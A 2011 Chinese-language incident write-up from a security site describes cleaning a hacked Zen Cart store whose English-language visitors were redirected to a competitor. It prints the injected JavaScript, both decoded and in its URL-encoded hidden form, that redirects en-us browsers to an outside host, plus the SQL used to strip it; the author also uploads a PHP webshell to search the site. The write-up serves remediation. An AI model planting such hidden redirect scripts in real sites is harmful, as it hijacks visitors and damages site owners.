热门关键字:   网站安全  黑客攻防  安全漏洞  系统安全  网络安全
站外
广告
域名申请虚拟主机 信息安全 域名注册 云主机 网络安全技术 企业网络安全 站外
广告
文字广告位招租 文字广告位招租 文字广告位招租 文字广告位招租 云安全

记录一次网站被黑抓马记

发布时间:2011-01-11 16:54文章来源:黑白前线文章作者:过客 点击次数:
摘要:图文:黑白前线/udb311 主题:记录一次网站被黑抓马记 前言: 昨天接到一个朋友的委托,任务是解决网站遇到英文浏览器自动跳转到另一个网站的问题。 背景: 现在的网络时代,黑客与商业并存的时代。有些人利用入侵技术来达到利益问题,成为网络中的黑色产业...

图文:黑白前线/udb311

主题:记录一次网站被黑抓马记


前言:昨天接到一个朋友的委托,任务是解决网站遇到英文浏览器自动跳转到另一个网站的问题。

背景:现在的网络时代,黑客与商业并存的时代。有些人利用入侵技术来达到利益问题,成为网络中的黑色产业链。有人利用入侵挂马,抓肉鸡。有人利用入侵挂链,做SEO优化。呵呵,五花八门啊。今天碰到的这个问题和SEO优化有关,是利用别人的网站浏览用户传送到指定网站。委托人的网站是外贸英文站,主要对老外出售一些商品。而跳转的网站正是同行。呵呵!有些明白了吧,这就是SEO手段的一种。


事件回放结束,开始入题。

从现象上分析“遇到英文浏览器自动跳转”,很显示是网站代码的问题,排队了域名劫持的可能性。网站采用的是Zen Cart程序,首先声明下哥对这个东西并不熟悉哦!但解析思路是有的,首页看下网站首页有没有可疑的JS代码。很为判断浏览器的代码都是以JS代码来实现的。

 

打开网站首页从浏览器,查看-源文件。先搜索下跳转到的URL地址的关键字,7louisvuitton.com未发现结果。接下来只能一行行看代码了,严格注意js的代码。从头到尾看了半天仍然未发现可疑的代码。这个看似有些难度了。接着进入后台,利用Zen Cart源码搜索功能搜索下关键字。执行过,文件都查一遍仍然没找到。

 

这时接过FTP用户密码信息,操刀上了php webshell。利用文件查找功能对网站文件进行全面的关键字搜索,反复查找都没有结果。看来这东西要么是存在数据库中,要么就是换了url地址了。百度下zen cart模板使用,关键的几个部分都手动查找下,仍然没发现结果。

 

这时又去网站页面的商品页仔细打量了一番,在注释这里<!--bof Product description -->发现了一段进行编码过的js。

感觉有些问题,马上拿出url解码器来看。




发现两段代码:
  1. <script language="javascript" src="http://count40.51yes.com/click.aspx?id=401446169&logo=6" charset="gb2312"></script> 

这个是流量统计

  1. <script language="JavaScript">   
  2. <!--   
  3. var la=navigator.browserLanguage.toLowerCase();  
  4. if(la=='en-us') document.location = 'http://ii3v.com/b';  
  5. // -->   
  6. </script> 
  7.  

这个就是关键了,判断浏览器版本是en-us 就跳。。。哈哈,很犀利啊。

这里跳转的URL和关键字的那个是同一个网站。

下面发现了代码就好说了,商品应该是模板的问题吧。马上找到模板。
templates\template_default\templates\tpl_document_product_info_display.php

内容就一个变量<?php echo stripslashes($products_description); ?>,郁闷了。没玩过Zen Cart。不知道这个变量从哪来的了。找了半天没头绪了,只好去数据库看下了。利用php webshell 备份功能连接进了数据库,看到库里正好有一个products_description的表,马上备份下载之。

本地mysql还原之

相关命令

  1. mysql -uroot -p123456  
  2.  
  3. create database aaa;  
  4.  
  5. use aaa;  
  6.  
  7. source d:\1.sql;  
  8.  

恢复后
果然发现在商品描述的表前面都被插入了这段代码。


 


利用批理替换,马上恢复了正常。


代码如下:

update products_description set products_description =replace (products_description,'<div style="display:none"><script language="javascript" src=" http://%63%6F%75%6E%74%34%30%2E%35%31%79%65%73%2E%63%6F%6D/click.aspx?id=401446169&logo=6" charset="gb2312"></script><script><!--
document.write(unescape("%3Cscript%20language%3D%22JavaScript%22%3E%20%0D%0A%3C%21--%20%0D%0Avar%20la%3Dnavigator.browserLanguage.toLowerCase%28%29%3B%0D%0Aif%28la%3D%3D%27en-us%27%29%20document.location%20%3D%20%27http%3A//%69%69%33%76%2E%63%6F%6D/b%27%3B%0D%0A//%20--%3E%20%0D%0A%3C/script%3E"));//--></script></div>','')
 

 
 

下面的任务就是查找php木马与后门,升级Zen Cart至最新了。

至此任务完成,这可算是比较犀利的SEO攻击法啊。
 

标签分类:

上一篇:从团购网的漏洞看网站安全性
下一篇:一种普遍的社会工程学的反思--密码心理学